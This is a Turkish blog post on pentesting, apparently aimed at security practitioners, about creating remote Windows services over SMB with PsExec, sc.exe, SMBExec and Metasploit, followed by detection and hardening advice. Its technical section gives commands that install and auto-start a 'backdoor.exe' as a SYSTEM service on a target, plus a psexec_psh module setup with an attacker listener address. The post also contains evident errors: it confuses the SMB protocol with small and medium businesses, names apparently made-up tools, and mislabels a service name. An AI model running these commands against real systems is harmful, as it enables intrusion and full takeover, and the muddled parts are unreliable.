CyberFlow Logo CyberFlow BLOG
Smb Pentest

SMB Üzerinden Uzaktan Servis Oluşturma: Siber Güvenlikte Temel Adımlar

✍️ Ahmet BİRKAN 📂 Smb Pentest

SMB üzerinden uzaktan servis oluşturmak için gerekli adımları öğrenin. Siber güvenlik uzmanlarına yönelik pratik bilgiler sunuyoruz.

SMB Üzerinden Uzaktan Servis Oluşturma: Siber Güvenlikte Temel Adımlar

SMB üzerinden uzaktan servis oluşturmak, sızma testlerinde kritik bir yetenektir. Bu yazıda, güvenlik uzmanları için hizmet yaratma süreçlerini keşfedin.

Giriş ve Konumlandırma

Uzaktan hizmetlerin oluşturulması, modern bilişim güvenliği bağlamında önemli bir konudur. Kısa bir süre önce, siber saldırılar genellikle zincirin zayıf halkası olan kullanıcı veya sistemler üzerinden gerçekleştiriliyordu. Ancak recent gelişmelerle birlikte, saldırganlar uzaktan erişim sağlayarak, kritik sistem bileşenlerine daha doğrudan ulaşım sağlama yöntemlerini tercih etmeye başladılar. Bu bağlamda, SMB (Server Message Block) protokolü, siber güvenlik alanında hem göz ardı edilen hem de sıkça kullanılan bir hedef haline gelmiştir.

SMB Nedir ve Neden Önemlidir?

SMB, Windows işletim sistemleri arasında dosya ve yazıcı paylaşımı, oturum açma işlemleri ve diğer ağ hizmetleri için kullanılan bir protokoldür. Aynı zamanda, yönetimsel görevlerin gerçekleştirilmesi için uzaktan komut gönderimine olanak tanır. Saldırganlar, SMB aracılığıyla sistem hizmetlerini hedef alarak, uzaktan servis oluşturabilir ve hassas verileri ele geçirebilirler.

Bir siber güvenlik perspektifinden bakıldığında, uzaktan servis oluşturma, ağ güvenliğini test etmek ve güçlü yanları belirlemek için kritik öneme sahiptir. Pentest (sızma testi) aşamasında, yalnızca zayıf noktaların bulunması değil, aynı zamanda bu zayıf noktaların nasıl istismar edileceğini anlamak da önemlidir. Bu süreç, hem saldırganların hem de savunma mekanizmalarının öngörülerini geliştirmek için büyük fırsatlar sunar.

Pentest ve Savunma Açısından Bağlam

Pentest süreçlerinde, uzaktan hizmet oluşturma, bir hedef sistemin zayıflıklarının tespit edilmesi ve kullanılması açısından kritik bir yöntemdir. Örneğin, bir pentester olarak, bir sistemdeki ADMIN$ paylaşımına erişim sağlamadan, belirli bir uzaktan hizmet yaratımı yapmak zor olacak, çünkü bu erişim genellikle saldırının başlangıç noktasıdır. Uzaktan hizmet oluşturma işlemi, sistemin yönetim işlevlerine doğrudan müdahale edilmesini sağlayarak, saldırı vektörlerini genişletir.

Her ne kadar bu yöntemler saldırganlar tarafından kötüye kullanılsa da, şirketlerin güvenliğini artırmak için benzer tekniklerin uygulanması gereklidir. Ağ mimarilerinde uygun denetimler uygulanmadığı takdirde, her makine bir saldırı üssü haline gelebilir. Dolayısıyla, siber güvenlik uzmanlarının bu bilgilere hâkim olması ve gerekli önlemleri alabilmesi son derece önemlidir.

# SMB üzerindeki hizmetleri görüntülemek için kullanılabilecek temel komut:
sc \\target_ip query state= all

Yukarıdaki komut, uzaktaki bir sistemdeki hizmetlerin durumunu sorgulamak için kullanılmaktadır. Siber saldırıların gerçek zamanlı olarak analiz edilmesi ve potansiyel güvenlik açıklarının tespit edilmesi açısından kullanılabilir.

Teknik İçeriğe Hazırlık

Bu yazı, SMB üzerinden uzaktan hizmet oluşturma sürecinde izlenmesi gereken temel adımları ele alacaktır. Bu çerçevede, sistemin güvenliğini artırmak ve saldırıların önüne geçmek amacıyla, belirli teknik bilgilerin yanı sıra, savunma mekanizmaları hakkında da bilgi vermeyi hedefliyoruz. Sırasıyla, Servis Kontrol Yöneticisi (SCM), PsExec, önemli parametreler ve sistemde bırakılan izler gibi konulara detaylıca göz atılacaktır.

Uzaktan hizmet oluşturma, yalnızca bir sızma testi uygulaması olarak değil; saldırganların erişim sağlayabileceği alanları tespit etme ve bu alanlar üzerinden savunma stratejileri geliştirme açısından da önem taşır. Siber güvenlik alanında başarılı olabilmek için, belirtilen teknikleri ve yöntemleri anlamak, uygulamak ve geliştirmek kritik bir rol oynar. Gelecek bölümlerde, bu tekniklerin nasıl gerçekleştirileceğine dair derinlemesine bilgilere ulaşmak üzere, hazırlıklı olunmalıdır.

Teknik Analiz ve Uygulama

Mekanizma Temeli: SCM

SMB (Server Message Block) protokolü, ağ üzerinden iletişim kurmayı sağlayan bir mekanizmadır. Özellikle Windows işletim sistemlerinde, uzaktan servis oluşturma işlemleri için servis kontrol yöneticisi (SCM - Service Control Manager) ile etkileşim kurmak kritik bir adımdır. SCM, Windows'ta servislerin oluşturulması, yönetilmesi ve durdurulmasından sorumlu olan merkezi bir birimdir. SMB üzerinden yapılan servis saldırıları doğrudan bu birimi hedef alır.

Taşıyıcı Boru Hattı: svcctl

Uzaktan iletişim kurmak için SCM ile SMB protokolü içinde isimlendirilmiş bir boru hattı (named pipe) kullanılır. Bu boru hattı, hizmetlerin yönetilmesi ve uzaktan servis oluşturmada önemli bir rol oynar. Bu bağlamda \\pipe\\svcctl kanalı, servis oluşturma ve yönetme işlemleri için ana iletişim yolu olarak kullanılır.

PsExec Çalışma Mantığı

PsExec, uzaktan sistemlerde komut çalıştırmak için yaygın olarak kullanılan bir araçtır. Hedefteki ADMIN$ paylaşımına bir .exe dosyası yükleyerek, daha sonra bu dosyayı bir servis olarak mühürler ve çalıştırır. Aşağıda, PsExec komutunun örnek bir kullanımı gösterilmektedir:

psexec \\\\10.0.0.5 -u admin -p password cmd.exe /c "C:\\temp\\backdoor.exe"

Bu komut ile uzaktaki 10.0.0.5 IP adresine sahip makinede belirtilen .exe dosyası çalıştırılır.

Erişim Gereksinimi: ADMIN$

Uzaktan servis oluşturmak için, saldırganın sistemdeki gizli yönetimsel paylaşıma erişim yetkisine sahip olması gerekmektedir. Özellikle ADMIN$ paylaşımına yazma (WRITE) yetkisi, saldırının gerçekleştirilmesi için kritik öneme sahiptir. Bu paylaşıma erişim, birçok sızma testi senaryosunun temelini oluşturur.

Servis Parametreleri

Yeni bir servis oluşturulurken Windows'a bu servisin nasıl davranacağı hakkında bilgi verilmesi gerekir. Örneğin, bir servis oluşturmak için aşağıdaki sc komutu kullanılabilir:

sc \\\\10.0.0.5 create CyberFlow binPath= C:\\temp\\backdoor.exe

Bu komut, hedef sistem üzerinde "CyberFlow" adında bir servis oluşturur ve belirtilen binPath üzerinden çalıştırır. Böylece, servis etkinleştirildiğinde, belirlenen backdoor.exe yürütülecektir.

SC.exe ile Manuel Oluşturma

Pentester olarak, otomatik araçlar yerine ham Windows komutlarıyla uzaktan servis oluşturabilmek gereklidir. Aşağıdaki basit sc komutuyla manuel olarak bir servis oluşturulabilir:

sc \\\\10.0.0.5 create CyberFlow binPath= C:\\temp\\backdoor.exe obj= "NT AUTHORITY\\SYSTEM" start= auto

Bu komut, yeni bir servis oluştururken servis çalıştırılma yetkisini de belirlemektedir. Varsayılan olarak sistemin en yüksek yetkilerini kullanması sağlanmıştır.

SMBExec'in Farkı

SMBExec, PsExec'e benzer bir araçtır, ancak farklı bir yaklaşım sergiler. PsExec, bir dosya yükleyip bu dosyayı bir servis olarak mühürlerken, SMBExec doğrudan komutları bir cmd /c çağrısı ile geçici bir servis üzerinden yürüterek daha sessiz ve iz bırakmayan bir yöntem sunar. Bu sayede, sistem üzerinde daha az belirgin kalıntı bırakılması hedeflenir.

Yetki Zirvesi: SYSTEM

Windows servisleri, aksine bir yetki belirtilmediği sürece SYSTEM kullanıcısının yetkisiyle çalışır. Bu, sızma testinin nihai hedefidir çünkü sistem üzerinde en yüksek erişim seviyesine sahip olmak, potansiyel bir saldırgan için büyük bir avantaj sağlar.

Metasploit psexec_psh

Metasploit framework'ünde, PowerShell tabanlı psexec_psh modülü kullanılarak uzaktan komutlar çalıştırmak mümkündür. Aşağıdaki komut, bu modülü kullanarak bir uzaktan servis oluşturmayı hedefler:

use exploit/windows/smb/psexec_psh
set RHOST 10.0.0.5
set LHOST <your_ip>
exploit

Bu komutlarla, belirttiğiniz IP üzerinden hedef sisteme PowerShell komutları ile istenen işlemler gerçekleştirilir.

Adli Bilişim İzleri (Artifacts)

Uzaktan servis oluşturma işlemleri, sistemde belirgin izler bırakır. Yeni oluşturulan servislerle ilişkili log kayıtları, kayıt (registry) girdileri ve kurulum bilgileri sistemde kaydedilir. Örneğin, yeni bir servis kurulduğunda Event ID 7045 log kaydı oluşturulur ve bu durum güvenlik ekipleri tarafından izlenmelidir.

Savunma ve Hardening

Uzaktan servis saldırılarını durdurmak için, ağ mimarisinde sağlam bir savunma stratejisi oluşturulmalıdır. Bunun için;

  • LAPS (Local Administrator Password Solution): Yerel admin parolalarının farklılaştırılarak yayılmayı durdurma.
  • Admin Restricted Mode: Yöneticilerin ağ üzerinden servis oluşturma yetkilerinin kısıtlanması.
  • EDR Alerting: SCM üzerinden yapılan şüpheli servis kayıtlarının gerçek zamanlı izlenmesi.

Nihai Hedef: Full Control

Sızma testinin nihai hedefi, sistem üzerinde tam kontrol sağlamaktır. Bu, servis oluşturma, uzak dosya yürütme gibi tüm saldırı vektörlerini kullanarak sistemin kontrolünü elde etmek anlamına gelir.

Yukarıda belirtilen teknik detaylar, SMB üzerinden uzaktan servis oluşturma sürecini anlamak ve uygulamak için gerekli olan temel adımları kapsamaktadır. Bu bilgilerin siber güvenlik testlerinin planlanması ve uygulanması sırasında dikkate alınması, organizasyonlar için önemli bir koruma katmanı sağlayacaktır.

Risk, Yorumlama ve Savunma

Siber güvenlik alanında küçük ve orta ölçekli işletmelere (SMB) yönelik tehditler, genellikle yanlış yapılandırmalardan ve zayıf güvenlik önlemlerinden kaynaklanır. Uzaktan servis oluşturarak ağlarına sızılmak istenildiğinde, bu durumun getirdiği risklerin iyi anlaşılması ve yorumlanması gerekmektedir. Aşağıda, bu süreçte dikkate alınması gereken temel unsurları ele alacağız.

Elde Edilen Bulguların Güvenlik Anlamı

Uzaktan bir hizmet oluşturmak istendiğinde gerçekleştirilen eylemler, sistemin güvenlik seviyesini açıkça ortaya koyar. Örneğin, bir saldırganın sistem üzerinde gerçekleştirebildiği işlemler, şunlar olabilir:

  1. Servis Oluşturma: Saldırgan, SC.exe veya PsExec aracı kullanarak hedef sistemde yeni bir servis oluşturabiliyorsa, bu durum ağın yönetimsel paylaşımlarının sızma testlerine olan karşı direncinin zayıf olduğunu gösterir.
  2. Sızma Hedefleri: Veritabanı, içerik yönetim sistemi veya diğer kritik uygulamalar üzerine yapılan saldırılar, veri güvenliği zafiyetlerinin habercisidir.

Aşağıdaki kod, bir Windows sisteminde yeni bir servis oluşturacak örnek bir komut göstermektedir:

sc \\10.0.0.5 create CyberFlow binPath= C:\temp\backdoor.exe start= auto

Bu komut, BACKDOOR adında bir servis yaratarak, sistemde kötü niyetli bir yazılımı otomatik olarak başlatmayı sağlamaktadır.

Yanlış Yapılandırma ve Zafiyetler

Yanlış yapılandırmalar, birçok siber saldırının temelini oluşturur. Örneğin, saldırganın erişim izni almadan bir servisi oluşturabilmesi, sistemin yapılandırılmasında bir açığın olduğunu gösterir. Microsoft'un paylaştığı yönetimsel paylaşımlar (ADMIN$ gibi) kötüye kullanıma açıktır. Bu tür paylaşımlara yazma yetkisi bulunması, ağın güvenlik seviyesinin tehlikeye girmesi anlamına gelir.

Sızan verileri ve sistemin topolojisini incelemek, bu tür zafiyet ve yanlış yapılandırmaların varlığını ortaya çıkarmak açısından kritik öneme sahiptir. Hedef sistemde var olan kullanıcı hesaplarını incelemek ve olası zayıflıkları değerlendirmek, güvenlik analistlerinin dikkat etmesi gereken önemli unsurlardır.

Sızan Veri ve Servis Tespiti

Sızan veriler genellikle iki şekilde tespit edilir: sistem logları ve kullanıcı davranışları. Örneğin, Windows Event Viewer'da Event ID 7045, yeni bir servisin sistemde kurulduğunu kaydeder. Bu tür uyarılar, güvenlik ekiplerinin potansiyel bir tehdidi hızlıca tanımasına yardımcı olur.

Bir diğer önemli bulgu, sistemde zayıf şifreleme veya kimlik doğrulama yöntemleri kullanılıyor ise, servislerin veya uygulamaların dışarıdan erişimine izin verilmesidir. Failover ve Detoxify gibi araçlarla iz bırakmadan çalıştırılan servisler, sızma sonrası detaylı analizlerde yakalanabilir.

Önlemler ve Hardening Önerileri

Siber saldırıların önlenmesi ve mevcut sistemlerin sertleştirilmesi için alınması gereken önlemler şunlardır:

  1. Güçlü Kimlik Doğrulama: Yönetimsel paylaşımlara erişim sınırlamalarını artırmak için multi-faktör kimlik doğrulama kullanılması.

  2. Ağ Segmentasyonu: Kritik sistemlerin izolasyonu, saldırıların yayılmasını önler.

  3. Yazılım Güncellemeleri: Sistemlerdeki yazılımların en güncel versiyonları ile verimliliğin artırılması.

  4. Log Yönetimi: Eşzamanlı log kayıtları ile anlamlı veri toplamak, anında müdahale fırsatları yaratır.

  5. EDR Uygulamaları: Endpoint Detection and Response kullanarak şüpheli aktiviteleri anında denetlemek.

Sonuç Özeti

Uzaktan servis oluşturma, siber güvenlik tehditlerinin analiz edilmesi ve zayıflıkların belirlenmesi için kritik bir süreçtir. Risklerin etkili bir şekilde yorumlanması, işletmelerin bu tehditlere karşı daha iyi önlemler alabilmesine olanak tanır. Yanlış yapılandırmaların ve zafiyetlerin hızla belirlenmesi, sistemlerin güvenliğini artırarak, olası saldırıların etkisini önemli ölçüde azaltır. Alınacak profesyonel önlemler ve sertleştirme uygulamaları, SMB'lerin siber dünyada daha sağlam durmasını sağlayacaktır.